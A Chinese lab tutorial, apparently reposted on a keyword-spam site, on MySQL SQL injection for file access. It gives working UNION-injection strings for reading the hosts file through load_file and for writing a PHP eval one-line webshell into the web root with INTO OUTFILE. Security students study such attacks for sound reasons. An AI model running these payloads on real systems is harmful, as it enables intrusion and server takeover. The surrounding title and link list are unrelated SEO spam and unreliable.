当前位置: 首页 > news >正文

茂名疫情最新消息seo管理平台

茂名疫情最新消息,seo管理平台,学做网站的软件,汕头网站建设设计公司文章目录 条件利用SQL注入漏洞读取hosts文件查看文件读写权限安全选项允许导入导出读取hosts文件 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell写入文件 条件 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要 目的在于获取web…

文章目录

  • 条件
  • 利用SQL注入漏洞读取hosts文件
    • 查看文件读写权限
    • 安全选项允许导入导出
    • 读取hosts文件
  • 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell
    • 写入文件

条件

SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要

目的在于获取webshell或盗取重要文件。

  1. 当前(连接)数据库的用户具有文件读写权限。
  2. 已知读写目标文件的绝对路径。

web 应用在服务器上的绝对路径,一般情况下是不知道的。

但是系统敏感文件的路径是固定的。

  1. 安全选项secure_file_priv允许导入导出操作。

secure_file_priv=null,不允许导入导出操作。

secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。

secure_file_priv= ,不对导入导出操作做限制。

利用SQL注入漏洞读取hosts文件

查看文件读写权限

输入语句逐个查看当前用户,查看到第三个用户发现他是root权限:

?id=1' and 1=2 union select 1,user(),3 --+

在这里插入图片描述

输入语句查看用户的权限

?id=1' and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost' --+

查看后用户具有文件读写权限:

在这里插入图片描述

安全选项允许导入导出

登录phpMyAdmin,点击变量,在搜索框中搜索priv,可以看到下面的变量,secure file priv的值为null:

在这里插入图片描述

然后在phpstudy中打开配置文件:

在这里插入图片描述

在mysqld中加入secure_file_priv=,保存

在这里插入图片描述

重启phpstudy,并刷新phpMyAdmin页面,搜索后发现发现变量secure file priv的值已经为空,此时已修改成功:

在这里插入图片描述

读取hosts文件

已知hosts文件的绝对路径是c:\windows\system32\drivers\etc\hosts,输入下面的联合查询语句,对hosts文件进行读取(注意需要对路径中的\进行转义):

?id=1' and 1=2 union select 1,2,load_file("c:\\windows\\system32\\drivers\\etc\\hosts") --+

读取成功:

在这里插入图片描述

利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell

写入文件

输入下面SQL语句,在www目录下写入一个muma.php文件

?id=1' and 1=2 union select 1,"<?php @eval($_REQUEST[777])?>",3 into outfile
"c:\\phpstudy\\WWW\\muma.php" --+

执行成功:

在这里插入图片描述

写入的文件:

在这里插入图片描述

http://www.mmbaike.com/news/75660.html

相关文章:

  • 网站建设类型有哪些seo外链专员
  • 一对一视频网站建设怎样推广品牌
  • 网页制作3个网页的网站图片seo优化方法网站快速排名推广渠道
  • 深圳网站优讳化网站建设的重要性
  • 注册网站页面跳转错误长尾关键词排名系统
  • 旅游网站怎么做才能被关注常见的营销型网站
  • 中国工程建设信息网站十大营销策略有哪些
  • 让人做网站 需要准备什么条件近三年成功的营销案例
  • 网站提升权重网络运营是做什么的
  • 自己做的网站怎么放到小程序网络营销的有哪些特点
  • 泊头哪有哪家做网站做的号百度关键词优化快速排名软件
  • 帮别人做网站交税网络推广的渠道
  • 360云主机可以建设网站吗传统营销方式有哪些
  • 中国品牌网官网入口seo专员是做什么的
  • 网页制作基础教程黄洪杰合肥seo搜索优化
  • 郑州专业做网站公司网站公司
  • 河北建设部官方网站北京百度seo工作室
  • wordpress 自定义页面模板下载南京seo收费
  • 学校网站建设的意义和应用在线crm系统
  • 谁能低价做网站支付接口查数据的网站有哪些
  • 做网站项目的心得直通车关键词怎么优化
  • 青岛做外贸网站的公司简介天天seo伪原创工具
  • 企业网站程序性能优化工具
  • 做网站为什么能赚钱吗全国各城市疫情高峰感染进度
  • 哪个网站买域名好国内免费二级域名建站
  • 苏州专业做网站的公司哪家好百度关键词推广2元一天
  • 网站开发合同注意事项搜索引擎官网
  • 齐齐哈尔网站建设软文撰写案例
  • 南通wap网站建设seo搜索引擎优化技术教程
  • 网站变灰色代码长沙专业seo优化公司